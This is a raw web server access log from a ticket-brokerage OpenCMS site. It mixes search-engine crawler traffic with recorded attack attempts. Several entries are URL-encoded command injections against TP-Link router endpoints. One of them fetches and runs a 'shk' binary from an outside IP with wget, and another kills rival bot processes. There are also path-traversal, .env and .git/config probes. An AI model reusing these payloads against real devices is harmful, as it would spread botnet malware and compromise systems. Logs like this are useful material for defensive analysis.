5.1.51.86 - - [28/Jun/2024:00:32:18 +0200] "GET / HTTP/1.1" 404 - 87.121.69.27 - - [28/Jun/2024:00:32:29 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 147.185.132.22 - - [28/Jun/2024:00:37:41 +0200] "????37?????g?C$? ?5?,:t??Q??O< " 400 - 147.185.132.22 - - [28/Jun/2024:00:37:41 +0200] "??P????x???Z?J"+/tmp/index1.php HTTP/1.1" 404 - 84.54.51.35 - - [28/Jun/2024:18:54:07 +0200] "GET /ticket2/opencms/index.php?lang=../../../../../../../../tmp/index1 HTTP/1.1" 404 - 35.205.194.243 - - [28/Jun/2024:19:03:21 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.83.197 - - [28/Jun/2024:19:09:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [28/Jun/2024:19:09:01 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 45.128.232.152 - - [28/Jun/2024:19:20:10 +0200] "CONNECT example.com:443 HTTP/1.1" 400 - 45.128.232.152 - - [28/Jun/2024:19:20:30 +0200] "???f?J?s?2??~??O?P?"?]}??$|? ??-'?????PQ??-K????U?Y????0h??:&?+?/?,?0????? ??" 400 - 66.249.66.160 - - [28/Jun/2024:19:26:29 +0200] "GET /ticket2/opencms/en/venue/?venueid=F948084C-F7DA-FF17-09AE-6FAF87CBA934 HTTP/1.1" 200 63648 40.118.210.79 - - [28/Jun/2024:19:35:37 +0200] "GET /ticket2/opencms/autodiscover/autodiscover.json?@zdi/Powershell HTTP/1.1" 404 - 87.121.69.27 - - [28/Jun/2024:19:47:51 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 66.249.66.161 - - [28/Jun/2024:20:02:29 +0200] "GET /ticket2/opencms/en/venue/?venueid=10FED53D-1B45-AB30-C853-C4BE292CA7FA HTTP/1.1" 200 63598 83.147.52.49 - - [28/Jun/2024:20:07:46 +0200] "GET /ticket2/opencms/html/.git/config HTTP/1.1" 404 - 40.77.167.41 - - [28/Jun/2024:20:29:48 +0200] "GET /ticket2/opencms/en/sport/football-tickets/la-liga/ HTTP/1.1" 200 76558 40.77.167.41 - - [28/Jun/2024:20:30:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery.js HTTP/1.1" 200 93868 40.77.167.41 - - [28/Jun/2024:20:30:05 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/standard.js HTTP/1.1" 200 3928 40.77.167.38 - - [28/Jun/2024:20:30:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-setup.js HTTP/1.1" 200 4923 40.77.167.38 - - [28/Jun/2024:20:30:09 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar.js HTTP/1.1" 200 49229 40.77.167.38 - - [28/Jun/2024:20:30:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/common-ajax.js HTTP/1.1" 200 20175 40.77.167.38 - - [28/Jun/2024:20:30:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.fancybox.pack.js HTTP/1.1" 200 23187 40.77.167.38 - - [28/Jun/2024:20:30:10 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery/jquery-ui.js HTTP/1.1" 200 228088 40.77.167.38 - - [28/Jun/2024:20:30:11 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/stickyfill.min.js HTTP/1.1" 200 5672 40.77.167.35 - - [28/Jun/2024:20:30:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/calendar-en.js HTTP/1.1" 200 3338 40.77.167.35 - - [28/Jun/2024:20:30:15 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/functions.js HTTP/1.1" 200 1583 40.77.167.35 - - [28/Jun/2024:20:30:16 +0200] "GET /ticket2/opencms/system/modules/com.gridnine.opencms.ticketbrokerage.site/resources/js/jquery.placeholder.min.js HTTP/1.1" 200 1737 57.128.141.133 - - [28/Jun/2024:20:31:45 +0200] "GET /ticket2/opencms/..;/..;/manager/html;/ HTTP/1.1" 404 - 66.249.66.160 - - [28/Jun/2024:20:38:29 +0200] "GET /ticket2/opencms/fr/sport/fotbollsbiljetter/serie_a/fiorentina/lecce.html HTTP/1.1" 500 - 66.249.66.161 - - [28/Jun/2024:20:55:45 +0200] "GET /ticket2/opencms/fr/sport/fotbollsbiljetter/serie_a/ HTTP/1.1" 500 - 66.249.66.160 - - [28/Jun/2024:21:04:47 +0200] "GET /ticket2/opencms/en/venue/?venueid=84B906DE-B460-D444-68C7-D7444F9F1F9B HTTP/1.1" 200 63651 45.128.232.110 - - [28/Jun/2024:21:17:24 +0200] "CONNECT 193.149.189.126:7227 HTTP/1.1" 400 - 178.128.114.99 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 178.128.114.99 - - [28/Jun/2024:21:28:40 +0200] "GET / HTTP/1.1" 404 - 178.128.114.99 - - [28/Jun/2024:21:28:40 +0200] "GET /download/powershell/ HTTP/1.1" 404 - 78.153.140.179 - - [28/Jun/2024:21:32:55 +0200] "GET /ticket2/opencms/.env HTTP/1.1" 404 - 45.156.130.2 - - [28/Jun/2024:21:43:26 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 141.98.83.197 - - [28/Jun/2024:22:04:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [28/Jun/2024:22:04:05 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 - 87.121.69.27 - - [28/Jun/2024:22:06:37 +0200] "CONNECT google.com:443 HTTP/1.1" 400 - 198.235.24.215 - - [28/Jun/2024:22:11:17 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 198.235.24.215 - - [28/Jun/2024:22:11:18 +0200] "GET /ticket2/opencms/en/ HTTP/1.1" 200 67190 193.106.29.106 - - [28/Jun/2024:22:18:10 +0200] "GET /ticket2/opencms/ HTTP/1.1" 302 - 45.55.133.111 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 83.147.52.49 - - [28/Jun/2024:22:51:37 +0200] "GET /ticket2/opencms/assets/.git/config HTTP/1.1" 404 - 147.185.132.58 - - [28/Jun/2024:23:01:09 +0200] "GET / HTTP/1.1" 404 - 80.76.49.133 - - [28/Jun/2024:23:23:44 +0200] "CONNECT 45.61.136.175:7227 HTTP/1.1" 400 - 45.55.133.111 - - [01/Jan/1970:00:59:59 +0100] "-" 400 - 162.142.125.47 - - [28/Jun/2024:23:37:01 +0200] "GET / HTTP/1.1" 404 - 162.142.125.47 - - [28/Jun/2024:23:37:01 +0200] "PRI * HTTP/2.0" 505 - 66.249.66.160 - - [28/Jun/2024:23:38:29 +0200] "GET /ticket2/opencms/sv/search.html?searchQuery=Brescia&submit= HTTP/1.1" 200 88604 66.249.66.160 - - [28/Jun/2024:23:38:31 +0200] "GET /ticket2/opencms/sv/ask-form.html HTTP/1.1" 200 2918 45.55.133.111 - - [28/Jun/2024:23:39:31 +0200] "GET / HTTP/1.1" 404 - 45.55.133.111 - - [28/Jun/2024:23:39:31 +0200] "GET /favicon.ico HTTP/1.1" 404 - 40.77.167.26 - - [28/Jun/2024:23:41:02 +0200] "GET /ticket2/opencms/en/venue/?countryid=EFE62657-ED88-7045-031D-E16EFB5F4910 HTTP/1.1" 200 93013 141.98.83.197 - - [28/Jun/2024:23:49:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60for+proc_dir+in+%2Fproc%2F%5B0-9%5D%2A%3B+do+pid%3D%24%7Bproc_dir%23%23%2A%2F%7D%3B+buffer%3D%24%28cat+%22%2Fproc%2F%24pid%2Fmaps%22%29%3B+if+%5B+%22%24%7B%23buffer%7D%22+-gt+1+%5D%3B+then+if+%5B+%22%24%7Bbuffer%23%2A%22%2Flib%2F%22%7D%22+%3D+%22%24buffer%22+%5D+%26%26+%5B+%22%24%7Bbuffer%23%2A%22telnetdbot%22%7D%22+%3D+%22%24buffer%22+%5D%3B+then+kill+-9+%22%24pid%22%3B+fi%3B+fi%3B+done%60) HTTP/1.1" 404 - 141.98.83.197 - - [28/Jun/2024:23:49:47 +0200] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60cd+%2Ftmp%3B+rm+-rf+shk%3B+wget+http%3A%2F%2F45.148.10.78%2Fshk%3B+chmod+777+shk%3B+.%2Fshk+tplink%3B+rm+-rf+shk%60) HTTP/1.1" 404 -